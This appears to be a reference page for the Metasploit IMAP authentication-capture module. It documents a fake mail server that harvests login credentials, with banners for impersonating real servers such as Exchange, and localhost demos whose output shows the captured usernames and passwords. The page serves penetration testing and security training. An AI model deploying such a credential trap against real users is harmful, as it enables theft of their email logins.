Authentication Capture: IMAP - Metasploit


This page contains detailed information about how to use the auxiliary/server/capture/imap metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Authentication Capture: IMAP
Module: auxiliary/server/capture/imap
Source code: modules/auxiliary/server/capture/imap.rb
Disclosure date: -
Last modification time: 2020-05-12 22:15:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module provides a fake IMAP service that is designed to capture authentication credentials.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use auxiliary/server/capture/imap
msf auxiliary(imap) > show targets
    ... a list of targets ...
msf auxiliary(imap) > set TARGET target-id
msf auxiliary(imap) > show options
    ... show and set options ...
msf auxiliary(imap) > exploit

Knowledge Base

This module creates a mock IMAP server which accepts credentials.

Verification Steps

  1. Start msfconsole
  2. Do: use auxiliary/server/capture/imap
  3. Do: run

Options

BANNER

The Banner which should be displayed. Default is IMAP4. Some notable banners to emulate:

  • Dovecot ready.
  • IMAP 4 Server (IMail 9.23)
  • mailserver Cyrus IMAP4 v2.2.13-Debian-2.2.13-19 server ready
  • Welcome to Binc IMAP v1.3.4 Copyright (C) 2002-2005 Andreas Aardal Hanssen at 2018-11-08 11:17:35 +1100
  • The Microsoft Exchange IMAP4 service is ready.
  • Microsoft Exchange Server 2003 IMAP4rev1 server versino 6.5.7638.1 (domain.local) ready.

SSL

Boolean if SSL should be used, making this Secure IMAP. Secure IMAP is typically run on port 993. If SSLCert is not set, a certificate will be automatically generated. Default is False.

SSLCert

File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically generated. Default is ``.

Scenarios

IMAP Emulating Microsoft Exchange with Telnet Client

Server:

msf5 > use auxiliary/server/capture/imap 
msf5 auxiliary(server/capture/imap) > set banner "The Microsoft Exchange IMAP4 service is ready."
banner => The Microsoft Exchange IMAP4 service is ready.
msf5 auxiliary(server/capture/imap) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/imap) > 
[*] Started service listener on 0.0.0.0:143 
[*] Server started.
[*] IMAP LOGIN 127.0.0.1:42972 [email protected] / rapid7#1

Client:

root@kali:~# telnet 127.0.0.1 143
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
* OK The Microsoft Exchange IMAP4 service is ready.
01 LOGIN [email protected] rapid7#1
quit
Connection closed by foreign host.

Secure IMAP with Self-Signed Certificate and Alpine client

Server:

msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
[*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

Generating a RSA private key
.................................................................................................+++++
...................+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
msf5 > cat key.pem certificate.pem > selfsigned.pem
[*] exec: cat key.pem certificate.pem > selfsigned.pem

msf5 > cat /root/metasploit-framework/selfsigned.pem
[*] exec: cat /root/metasploit-framework/selfsigned.pem

-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDAXME8r2vEUH7B
Kelkt9iC4tTozOq0wJAjsACLCDcNoD4hUH16wy4Uf4SD3ZsEaL0YA0GU2ZgOo2ud
USBpOo8h9FEGtRrAAeSl7Z3XaBnuB7UmVMrnUVZxlaYi84JcopcTOs6KZ5VXddia
PEkE5G3jaCwOIqHk+c8Qk5b43HQbkj2jr4051gHeWP0UgBEy1TVPKtoywtyK1b5H
QhX7MYVNge8lQL/xJnBrjMDqIQqc41lCI73EPCuGZ7zB06xBsgyW/DTgQkprX+Qe
DVKtz8ZChLSqSwmz/5yFttRyZlDuXA7Kozhdj8obRAjzK/gKj89WsX/s2KUbq2GY
pdMpLh7/AgMBAAECggEBALCtQKpdMCzqBdGijgP8u3ZToluDwlprtregco8/51iz
gf0VMXqsg8k96dc3laZyEKNackSlqfxf6npeRdeAenAkNrtjYYNS+c/Qs7Vhntc5
6w6euJHG6g9+9E2LvIMarolx7LvAMbFXwq6+ig5dQ/Sm/DerZWiqbJ18ASDnUhjz
G1Y8/Idy4WutPZD/0JEQ+5VnHb+Mt3a7yYKhDsmUEzVh5xoWJab9dwfwCnoOb32T
oLOLLsqUbAK8ZiQ4MwkbGJ5kw8H24wVmI+7BbuRacW2tIIt6Z+vEoLdof0TsuJWo
87ZbCYYeTysIgBIdLNRiGGxz43SOqBBGh8sreyyACdECgYEA6Ubs1Klw3TViABke
1JqkWelZi6mtsyUHJt/eChjMzgg5vGVuYB/sCc+BObjETbfnvuV0Ub4cxbUCF3wL
qvrJNTd+yU7JJ7IP63B2lS3aNlAsLRb59SkjDYyym1OeUAHKkGp8oICSq96X3Xtu
KUZnDdh2UuoMzmEoAHoDoc+SC/cCgYEA0xmQ+qDJ4l3JRH/IPMPe9XD90WFJFhvF
GzGSM8qqpg6N2xhlzQiM6+I4EEh9iNnCOYmvw9leGNRpIjFjAhv5ntlG3LudAEpd
Ml/hhrfRB7KOopiqzK7oVCUv5f5rmvYdL4c2FC+VGxnhWUP6MARUHag/1DgszMs7
wSlwcbKi8zkCgYBMvRc1khPdwSze6WSZ/dEo/rmFVykb8Idcw3Iwkh31fQE5N4jK
uFWWmJtjGKQDCQeEZckRBuBCLZxli1nvQhakmf/sSy2jEFFqWxG3W2EYUuFlZ9SM
UJ8GWw16SVSf7ybqwQ0EY6dcQJpmsq73hwBprpamCfZygcV9+qVtOnJJ2wKBgBKY
ZPH+6em70zfqfawEoQZD3sfr5vFAnvtHQZa4WpHoJEzReF44S5mXwtKEYDKG5BoH
a+k3o5dSVrSBXzRXXITGpPxatnjJFC6UzZv9YzdnXjMqeZkwKx0GbZK396id13JR
Wc0rZ9oMTJJ9b3N9Xh+Cq6S5EhE0Md5RFSuezcXZAoGBAJOMfjbwobOCYm6K8PyV
p89gbnDOj7FHCg2JPa9/dii6pBRHXeUfORp00GfN0oAjjJo14SmOw58zh1mF1VcA
BQhTK9TO4GXIEZDiYt9EmiH1VO58I8vUecBcbelirumGOP+dBiBy/C8YzFJRhAis
eAGSi8F+qcJaS3VDRGEC9zcK
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDazCCAlOgAwIBAgIUMlkpAG2tXodgLSrIf/xOuA9z8PwwDQYJKoZIhvcNAQEL
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xODExMDkwMTI3MTRaFw0xOTEx
MDkwMTI3MTRaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
AQUAA4IBDwAwggEKAoIBAQDAXME8r2vEUH7BKelkt9iC4tTozOq0wJAjsACLCDcN
oD4hUH16wy4Uf4SD3ZsEaL0YA0GU2ZgOo2udUSBpOo8h9FEGtRrAAeSl7Z3XaBnu
B7UmVMrnUVZxlaYi84JcopcTOs6KZ5VXddiaPEkE5G3jaCwOIqHk+c8Qk5b43HQb
kj2jr4051gHeWP0UgBEy1TVPKtoywtyK1b5HQhX7MYVNge8lQL/xJnBrjMDqIQqc
41lCI73EPCuGZ7zB06xBsgyW/DTgQkprX+QeDVKtz8ZChLSqSwmz/5yFttRyZlDu
XA7Kozhdj8obRAjzK/gKj89WsX/s2KUbq2GYpdMpLh7/AgMBAAGjUzBRMB0GA1Ud
DgQWBBRezbFZBumaJ/MViZqqbllYrPomMzAfBgNVHSMEGDAWgBRezbFZBumaJ/MV
iZqqbllYrPomMzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAd
Smkooa2nhdDdu3/uHX8vhDC0ns5qotgd0YKGkj/QyzNP+ruP1cyq/q67zand/Eq8
gF+lHk+pX8GM0WvI7ypgrK956YCdmh3DULBFDu5RxVABFWrGedfNy6TKLTps0PXR
9mdB/HK0Msr6Mh/o5PkUhb1fx0T3NUwF1EFte7Nsq10Mq+hYVnEqDeEGMlb73frJ
729tCjNpFoLGdlgEcAEFelAujV0w4oj35CE2Fh3b+4wupDiulfgg9E7FtvS9xK0P
l/m7Kka0n7lXnKo+IFSJ0dTooBvwaV7+4tEGuHxWJsNO+2aex9qFCuDUdBFxyWyK
uBVlsY6F7EjTfWpxwyVP
-----END CERTIFICATE-----
msf5 > use auxiliary/server/capture/imap 
msf5 auxiliary(server/capture/imap) > set ssl true
ssl => true
msf5 auxiliary(server/capture/imap) > set sslcert /root/metasploit-framework/selfsigned.pem
sslcert => /root/metasploit-framework/selfsigned.pem
msf5 auxiliary(server/capture/imap) > set srvport 993
srvport => 993
msf5 auxiliary(server/capture/imap) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/imap) > 
[*] Started service listener on 0.0.0.0:993 
[*] Server started.
[+] IMAP LOGIN 127.0.0.1:59024 "johndoe" / "p455w0rd"

Clients:

root@kali:~# cat ~/.muttrc
set spoolfile="imaps://johndoe:[email protected]/INBOX"
set folder="imaps://127.0.0.1/INBOX"
set record="=Sent"
set postponed="=Drafts"

root@kali:~# mutt

The user is prompted about the invalid certificate, and the client gets stuck at "Logging in...", however it doesn't matter since the credentials have already been sent.

Go back to menu.

Msfconsole Usage

Here is how the server/capture/imap auxiliary module looks in the msfconsole:

msf6 > use auxiliary/server/capture/imap

msf6 auxiliary(server/capture/imap) > show info

       Name: Authentication Capture: IMAP
     Module: auxiliary/server/capture/imap
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  ddz <[email protected]>
  hdm <[email protected]>

Available actions:
  Name     Description
  ----     -----------
  Capture  Run IMAP capture server

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  BANNER   IMAP4            yes       The server banner
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  143              yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)

Description:
  This module provides a fake IMAP service that is designed to capture 
  authentication credentials.

Module Options

This is a complete list of options available in the server/capture/imap auxiliary module:

msf6 auxiliary(server/capture/imap) > show options

Module options (auxiliary/server/capture/imap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   BANNER   IMAP4            yes       The server banner
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  143              yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)

Auxiliary action:

   Name     Description
   ----     -----------
   Capture  Run IMAP capture server

Advanced Options

Here is a complete list of advanced options supported by the server/capture/imap auxiliary module:

msf6 auxiliary(server/capture/imap) > show advanced

Module advanced options (auxiliary/server/capture/imap):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   ListenerComm                     no        The specific communication channel to use for this service
   SSLCipher                        no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression  false            no        Enable SSL/TLS-level compression
   VERBOSE         false            no        Enable detailed status messages
   WORKSPACE                        no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the server/capture/imap module can do:

msf6 auxiliary(server/capture/imap) > show actions

Auxiliary actions:

   Name     Description
   ----     -----------
   Capture  Run IMAP capture server

Evasion Options

Here is the full list of possible evasion options supported by the server/capture/imap auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(server/capture/imap) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Go back to menu.

See Also

Check also the following modules related to this module:

Authors

  • ddz
  • hdm

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.